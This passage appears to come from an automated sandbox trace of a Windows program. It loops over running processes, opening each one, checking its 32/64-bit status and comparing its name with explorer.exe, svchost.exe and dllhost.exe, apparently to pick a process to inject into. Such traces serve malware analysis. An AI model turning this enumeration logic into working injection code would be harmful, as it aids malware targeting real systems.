bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0205.844] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.844] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.844] CloseHandle (hObject=0xec) returned 1 [0205.844] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0205.844] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0205.844] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0205.844] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.844] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.845] CloseHandle (hObject=0xec) returned 1 [0205.845] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0205.845] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0205.845] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0205.846] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.846] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.846] CloseHandle (hObject=0xec) returned 1 [0205.846] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0205.846] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0205.846] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.846] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.846] CloseHandle (hObject=0xec) returned 1 [0205.846] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0205.846] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0205.846] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0205.846] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0205.847] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5e4) returned 0x0 [0205.847] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0205.847] CloseHandle (hObject=0xe8) returned 1 [0205.847] Sleep (dwMilliseconds=0x3e8) [0206.935] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0206.937] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0206.938] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0206.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0206.938] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0206.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0206.939] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0206.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0206.939] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0206.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0206.940] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0206.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0206.940] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0206.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0206.941] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0206.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0206.941] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0206.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0206.942] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0206.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0206.942] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0206.943] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0206.943] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0206.944] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0206.944] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0206.945] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0206.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0206.945] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0206.946] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0206.946] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0206.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0206.947] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.947] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.947] CloseHandle (hObject=0xec) returned 1 [0206.947] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0206.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0206.948] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0206.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0206.948] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.948] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.948] CloseHandle (hObject=0xec) returned 1 [0206.948] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0206.949] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0206.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0206.949] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0206.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0206.950] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.950] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.950] CloseHandle (hObject=0xec) returned 1 [0206.950] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0206.950] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0206.950] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0206.950] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0206.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0206.950] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.950] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.950] CloseHandle (hObject=0xec) returned 1 [0206.950] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0206.950] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0206.950] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0206.951] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0206.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0206.951] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.951] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.951] CloseHandle (hObject=0xec) returned 1 [0206.951] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0206.951] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0206.951] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0206.951] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0206.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0206.952] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.952] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.952] CloseHandle (hObject=0xec) returned 1 [0206.952] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0206.952] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0206.952] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0206.952] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0206.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0206.952] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.952] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.952] CloseHandle (hObject=0xec) returned 1 [0206.953] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0206.953] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0206.953] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0206.953] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0206.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0206.953] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.953] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.953] CloseHandle (hObject=0xec) returned 1 [0206.953] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0206.953] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0206.953] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0206.953] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0206.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0206.954] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.954] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.954] CloseHandle (hObject=0xec) returned 1 [0206.954] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0206.954] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0206.954] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0206.954] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0206.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0206.955] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.955] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.955] CloseHandle (hObject=0xec) returned 1 [0206.955] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0206.955] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0206.955] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0206.955] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0206.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0206.955] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.955] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.955] CloseHandle (hObject=0xec) returned 1 [0206.955] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0206.955] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0206.955] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0206.955] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0206.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0206.956] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.956] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.956] CloseHandle (hObject=0xec) returned 1 [0206.956] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0206.956] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0206.956] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0206.956] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0206.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0206.957] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.957] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.957] CloseHandle (hObject=0xec) returned 1 [0206.957] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0206.957] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0206.957] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0206.957] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0206.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0206.957] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.957] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.958] CloseHandle (hObject=0xec) returned 1 [0206.958] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0206.958] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0206.958] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0206.958] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0206.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0206.958] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.958] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.958] CloseHandle (hObject=0xec) returned 1 [0206.958] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0206.958] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0206.959] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0206.959] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0206.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0206.959] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.959] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: 